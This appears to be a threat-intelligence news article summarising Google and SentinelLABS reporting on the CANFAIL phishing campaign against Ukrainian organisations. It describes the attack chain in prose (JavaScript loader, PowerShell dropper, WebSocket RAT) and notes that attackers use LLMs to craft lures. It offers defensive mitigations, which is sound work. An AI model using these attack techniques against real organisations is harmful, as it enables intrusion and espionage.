Google Threat Intelligence Group (GTIG) says a previously undocumented threat actor, likely tied to Russian intelligence, has used phishing to deliver a JavaScript backdoor called CANFAIL against Ukrainian defence, government and energy targets. The attacks used convincing lures and file-host links that led victims to an obfuscated JavaScript loader. That loader ran a PowerShell downloader, which then executed an in-memory dropper.
Below I summarise GTIG’s findings, add technical detail from industry reporting, list defensive steps, and include direct quoted lines from the official reports with links you can follow.
GTIG found a campaign that used LLM-crafted phishing lures and Google Drive links to deliver CANFAIL, an obfuscated JavaScript loader that runs a PowerShell stage and typically ends in a memory-only dropper. The actor targeted Ukrainian defence, military, government and energy organisations and also showed interest in aerospace and manufacturing.
“GTIG has recently discovered a threat group suspected to be linked to Russian intelligence services which conducts phishing operations to deliver CANFAIL malware primarily against Ukrainian organizations.”
Google “Phishing emails sent by the actor contain a lure that based on analysis appears to be LLM-generated, uses formal language and a specific official template, and Google Drive links which host a RAR archive containing CANFAIL malware, often disguised with a .pdf.js double extension.”
Independent analysis and supporting reporting
SentinelOne’s SentinelLABS previously documented a related campaign named PhantomCaptcha that used weaponised PDFs, fake Cloudflare CAPTCHA pages and a WebSocket RAT delivered via ClickFix-style social engineering. SentinelLABS described the final payload in that campaign as a WebSocket RAT that gives remote command execution and exfiltration capabilities. GTIG links the CANFAIL activity to similar social-engineering patterns and infrastructure observed in PhantomCaptcha.
“The final payload is a WebSocket RAT hosted on Russian-owned infrastructure that enables arbitrary remote command execution, data exfiltration, and potential deployment of additional malware.” SentinelLABS.
Technical breakdown — how the attack chain works
Initial lure: Targeted spearphish. Messages are written in formal, plausible language. GTIG says the text often appears LLM-generated and mimics official templates.
Delivery: A Google Drive link hosts a RAR archive. The archive contains a file with a double extension such as document.pdf.js that hides a JavaScript loader.
Execution: The obfuscated JavaScript executes and launches a PowerShell command. That command downloads a second-stage payload. The second stage is commonly a memory-only PowerShell dropper.
Goal: Establish a remote foothold, run reconnaissance, and enable further payloads or data theft. In other cases observed by SentinelOne, operators used WebSocket RATs for remote control and exfiltration.
Key indicators and TTPs
Lures that reference Ukrainian or regional energy organisations.
Google Drive links hosting RAR archives.
Filenames with double extensions like .pdf.js.
Obfuscated JavaScript that spawns PowerShell commands.
Memory-only PowerShell droppers (no disk artifacts).
WebSocket connections to recently registered domains or Russian-hosted infrastructure.
Who is being targeted
Primary targets reported by GTIG:
Defence and military organisations in Ukraine.
Government agencies at regional and national level.
Energy companies and utilities. Secondary interest:
Aerospace firms, manufacturers with drone or defence ties, nuclear and chemical research organisations, humanitarian organisations involved in Ukraine aid.
Why the actor is notable now
GTIG highlights two important shifts:
The actor appears less resourced than major espionage clusters but compensates by using large language models to craft better lures, automate reconnaissance, and assist in post-compromise tasks.
The campaign uses trusted cloud-hosting (Google Drive) and social techniques that make detection harder and speed up successful trickery.
Quick risk and mitigation mapping
Risk observed
Why it matters
Recommended immediate action
LLM-crafted spearphish (high fidelity)
Higher click rates and lower suspicion
Phishing-resistant MFA; targeted user awareness on “Paste & Run” techniques
Google Drive / RAR delivery
Trusted cloud hosting increases click-through
Block or scan archive downloads from external cloud links on critical users
.pdf.js double-extension loaders
Hides actual executable content
Enforce extension/association policies and scan for double-extension files
Memory-only PowerShell droppers
Hard to detect with file-only EDR
Enable PowerShell command logging and memory behavior analytics
WebSocket RATs to obscure C2
Stealthy C2 channels
Monitor WebSocket connections to unknown domains and new registrations
Practical defensive checklist
Enforce multi-factor authentication across all accounts, favouring hardware or phishing-resistant MFA.
Block or better inspect archive files from external cloud file-shares.
Log and alert on PowerShell invocations that run hidden or bypass execution policy.
Monitor for WebSocket traffic to unusual domains and for connections to recently registered hosts.
Train staff on “paste and run” social engineering and how to verify official communications.
Apply least privilege to email inboxes and admin resources; review third-party access.
Official Statements
GTIG (Google Cloud blog): “GTIG has recently discovered a threat group suspected to be linked to Russian intelligence services which conducts phishing operations to deliver CANFAIL malware primarily against Ukrainian organizations.” Read the full GTIG write-up here.
GTIG (on LLM use): “Phishing emails sent by the actor contain a lure that based on analysis appears to be LLM-generated, … Google Drive links which host a RAR archive containing CANFAIL malware, often disguised with a .pdf.js double extension.” Full context in GTIG’s post.
SentinelLABS (SentinelOne): “The final payload is a WebSocket RAT hosted on Russian-owned infrastructure that enables arbitrary remote command execution, data exfiltration, and potential deployment of additional malware.” Read SentinelLABS’ PhantomCaptcha analysis here.
FAQ
Q: Is CANFAIL a new malware family?
A: CANFAIL is an obfuscated JavaScript loader observed in these campaigns. Its use alongside in-memory PowerShell droppers and WebSocket RATs is the concerning pattern noted by GTIG and SentinelLABS.
Q: How are LLMs being used by attackers?
A: GTIG observed adversaries using LLMs to draft high-fidelity phishing lures, gather OSINT, and assist in technical tasks for post-compromise operations.
Q: Should organisations block Google Drive links entirely?
A: Not necessarily. Instead, apply inspection for archives from external sources, sandbox suspicious downloads, and limit file-share privileges for high-risk roles.
Q: Where can I find indicators of compromise (IoCs)?
A: GTIG’s blog post links and SentinelLABS’ PhantomCaptcha report include IoCs and hashes. Use those pages to import indicators into your SIEM or threat-hunting tools.
I am a Business Analytics student with a strong interest in publishing well-researched and data-driven news articles. I focus on analyzing trends in business, finance, and technology to create clear, accurate, and engaging content for readers. I enjoy transforming complex data and information into simple, meaningful stories that help audiences understand current developments. With analytical thinking and attention to detail, I aim to deliver credible and insightful news that adds real value to readers.
Readers help support VPNCentral. We may get a commission if you buy through our links.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
5 min. read 
Published on
User forum
0 messages